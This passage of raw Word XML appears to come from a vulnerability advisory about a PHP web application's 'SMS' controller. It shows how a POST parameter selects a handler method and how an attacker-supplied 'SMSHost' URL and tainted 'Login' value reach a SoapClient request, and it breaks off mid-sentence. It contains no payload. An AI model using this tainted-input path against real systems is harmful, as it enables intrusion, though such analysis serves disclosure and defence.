          </w:p>
          <w:p w14:paraId="2C2FA2A9" w14:textId="77777777" w:rsidR="003804C5" w:rsidRDefault="003804C5" w:rsidP="003804C5">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A7FF5A0" w14:textId="77777777" w:rsidR="003804C5" w:rsidRDefault="003804C5" w:rsidP="003804C5">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    // instantiate controller and invoke on it</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59FED8DC" w14:textId="77777777" w:rsidR="003804C5" w:rsidRDefault="003804C5" w:rsidP="003804C5">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Message::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>Trace("Invoking page");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20D252AE" w14:textId="77777777" w:rsidR="003804C5" w:rsidRDefault="003804C5" w:rsidP="003804C5">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="009B4314">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>$ctrl-&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009B4314">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>ProcessRequest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009B4314">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009B4314">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E145BC7" w14:textId="3FBAA01F" w:rsidR="003804C5" w:rsidRDefault="003804C5" w:rsidP="003804C5">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="376F3BAD" w14:textId="77777777" w:rsidR="005F553D" w:rsidRDefault="005F553D" w:rsidP="008E2160"/>
    <w:p w14:paraId="6EFCE30C" w14:textId="2FF0F762" w:rsidR="009B4314" w:rsidRDefault="009B4314" w:rsidP="008E2160">
      <w:r>
        <w:t>2)</w:t>
      </w:r>
      <w:r w:rsidR="005F553D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005F553D">
        <w:t>SMSTestController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005F553D">
        <w:t xml:space="preserve"> extends </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005F553D">
        <w:t>SAWController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005F553D">
        <w:t xml:space="preserve"> (/opt/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005F553D">
        <w:t>mvap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005F553D">
        <w:t>/web/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005F553D">
        <w:t>sms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005F553D">
        <w:t>/includes/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005F553D">
        <w:t>SAWController.class.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005F553D">
        <w:t xml:space="preserve">) and </w:t>
      </w:r>
      <w:r w:rsidR="003804C5">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005F553D">
        <w:t>ProcessRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003804C5">
        <w:t xml:space="preserve"> method</w:t>
      </w:r>
      <w:r w:rsidR="00960E1E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003804C5">
        <w:t xml:space="preserve">call </w:t>
      </w:r>
      <w:r w:rsidR="005F553D">
        <w:t>is handled by this base class.</w:t>
      </w:r>
      <w:r w:rsidR="00960E1E">
        <w:t xml:space="preserve">  Within </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00960E1E">
        <w:t>ProcessRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00960E1E">
        <w:t>, the POST parameter “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00960E1E">
        <w:t>saw_form_next</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00960E1E">
        <w:t>” is prepended with “on_” and then dynamically evaluated for a method call on the current class:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00960E1E" w14:paraId="51C6D9C8" w14:textId="77777777" w:rsidTr="00FB064C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0FC96F71" w14:textId="77777777" w:rsidR="00960E1E" w:rsidRDefault="00960E1E" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">function </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>processRequest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DC4F2D4" w14:textId="77777777" w:rsidR="00960E1E" w:rsidRDefault="00960E1E" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="072E68FE" w14:textId="710193FA" w:rsidR="00960E1E" w:rsidRDefault="00960E1E" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>…</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A7E9964" w14:textId="77777777" w:rsidR="00960E1E" w:rsidRDefault="00960E1E" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        if </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>( $</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_SERVER['REQUEST_METHOD'] == 'GET' )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A37C3C1" w14:textId="01C27B11" w:rsidR="00960E1E" w:rsidRDefault="00960E1E" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>…</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="085DA679" w14:textId="77777777" w:rsidR="00960E1E" w:rsidRDefault="00960E1E" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        else</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BC81DE4" w14:textId="77777777" w:rsidR="00960E1E" w:rsidRDefault="00960E1E" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="172F7492" w14:textId="77777777" w:rsidR="00960E1E" w:rsidRDefault="00960E1E" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Message::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>Trace("POST request to: ".SAW::config("</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>CurrentController</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>").</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1297B61F" w14:textId="77777777" w:rsidR="00960E1E" w:rsidRDefault="00960E1E" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "; ID=</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>".$</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_POST['</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>saw_form_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>']."; ACTION=".$_POST['</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>saw_form_next</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>']);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="613275C3" w14:textId="77777777" w:rsidR="00960E1E" w:rsidRDefault="00960E1E" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            $this-&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_formId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = $_POST['</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>saw_form_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>'</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>];</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="67DCA403" w14:textId="77777777" w:rsidR="00960E1E" w:rsidRDefault="00960E1E" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00960E1E">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve">if </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00960E1E">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve">( </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00960E1E">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>isset</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00960E1E">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve"> ($_POST['</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00960E1E">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>saw_form_next</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00960E1E">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>'] ))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="168CEFB1" w14:textId="77777777" w:rsidR="00960E1E" w:rsidRDefault="00960E1E" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                </w:t>
            </w:r>
            <w:r w:rsidRPr="00960E1E">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>$this-&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00960E1E">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>m_formAction</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00960E1E">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve"> = $_POST['</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00960E1E">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>saw_form_next</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00960E1E">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00960E1E">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>];</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="37D422A8" w14:textId="77777777" w:rsidR="00960E1E" w:rsidRDefault="00960E1E" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00960E1E">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00960E1E">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>actionMethod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00960E1E">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t xml:space="preserve"> = "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00960E1E">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>on_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00960E1E">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>".$</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00960E1E">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>this</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00960E1E">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>-&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00960E1E">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>m_formAction</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00960E1E">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60425A33" w14:textId="77777777" w:rsidR="00960E1E" w:rsidRDefault="00960E1E" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">            if </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t xml:space="preserve">( </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>method</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>_exists</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>( $this, $</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>actionMethod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> ) )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C8B4831" w14:textId="77777777" w:rsidR="00960E1E" w:rsidRDefault="00960E1E" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="365D6EB2" w14:textId="77777777" w:rsidR="00960E1E" w:rsidRDefault="00960E1E" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                // action handlers must invoke </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>update(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>) themselves, if required</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="396C75E9" w14:textId="77777777" w:rsidR="00960E1E" w:rsidRDefault="00960E1E" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                // Action handlers must also explicitly set </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_formAction</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> if</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10F43DEB" w14:textId="77777777" w:rsidR="00960E1E" w:rsidRDefault="00960E1E" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                // they do not redirect to another page</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04F824C9" w14:textId="77777777" w:rsidR="00960E1E" w:rsidRDefault="00960E1E" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                </w:t>
            </w:r>
            <w:r w:rsidRPr="00960E1E">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>$this-&gt;$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00960E1E">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>actionMethod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00960E1E">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00960E1E">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="008A395A" w14:textId="5ADC66B4" w:rsidR="00960E1E" w:rsidRDefault="00960E1E" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            }</w:t>
            </w:r>
            <w:r w:rsidR="00FB064C">
              <w:br/>
              <w:t>…</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0752B994" w14:textId="77777777" w:rsidR="00960E1E" w:rsidRDefault="00960E1E" w:rsidP="008E2160"/>
    <w:p w14:paraId="11BD92A6" w14:textId="6822F31D" w:rsidR="00960E1E" w:rsidRDefault="00960E1E" w:rsidP="008E2160">
      <w:r>
        <w:t xml:space="preserve">3) In </w:t>
      </w:r>
      <w:r w:rsidR="003B408B">
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> case, this results in the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>on_submit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” method of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SMSTestController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> being called. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>on_submit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> then calls “$this-&gt;_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>invokeSMS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>submitRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’)”</w:t>
      </w:r>
      <w:r w:rsidR="002A5BD7">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="002A5BD7" w14:paraId="320E0419" w14:textId="77777777" w:rsidTr="00FB064C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0A0E4C9D" w14:textId="77777777" w:rsidR="002A5BD7" w:rsidRDefault="002A5BD7" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">function </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>on_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>submit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="619DC9EC" w14:textId="0644A14C" w:rsidR="002A5BD7" w:rsidRDefault="002A5BD7" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D5846FC" w14:textId="77777777" w:rsidR="002A5BD7" w:rsidRDefault="002A5BD7" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    // update should already have occurred</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EA83319" w14:textId="77777777" w:rsidR="002A5BD7" w:rsidRDefault="002A5BD7" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    $this-&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>on_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>update</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55BD222B" w14:textId="77777777" w:rsidR="002A5BD7" w:rsidRDefault="002A5BD7" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00FB064C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>$this-&gt;_</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00FB064C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>invokeSMS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00FB064C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>( '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00FB064C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>submitRequest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00FB064C">
              <w:rPr>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>' );</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="293003C9" w14:textId="3B47A9AF" w:rsidR="002A5BD7" w:rsidRDefault="002A5BD7" w:rsidP="00FB064C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5ED5DD8F" w14:textId="47456AED" w:rsidR="002A5BD7" w:rsidRDefault="002A5BD7" w:rsidP="008E2160"/>
    <w:p w14:paraId="4D23E375" w14:textId="429C9E1B" w:rsidR="002A5BD7" w:rsidRDefault="002A5BD7" w:rsidP="008E2160">
      <w:r>
        <w:t>4) “_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>invokeSMS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” ultimately instantiates a PHP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SoapClient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and passes </w:t>
      </w:r>
      <w:r w:rsidR="003B408B">
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tainted “Login” parameter as </w:t>
      </w:r>
      <w:r w:rsidR="003804C5">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t>“login”</w:t>
      </w:r>
      <w:r w:rsidR="003804C5">
        <w:t xml:space="preserve"> parameter to the SOAP request</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. This </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SoapClient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> makes a SOAP request to </w:t>
      </w:r>
      <w:r w:rsidR="003804C5">
        <w:t>the URL provided in the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003804C5">
        <w:t>SMSHost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003804C5">
        <w:t xml:space="preserve">” POST Parameter with </w:t>
      </w:r>
      <w:r w:rsidR="00FB064C">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003804C5">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003804C5">
        <w:t>sms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003804C5">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SystemManagementService.php</w:t>
      </w:r>
      <w:r w:rsidR="003804C5">
        <w:t>?wsdl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">” appended to the end. In </w:t>
      </w:r>
      <w:r w:rsidR="0006413C">
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> case, “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SMSHost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
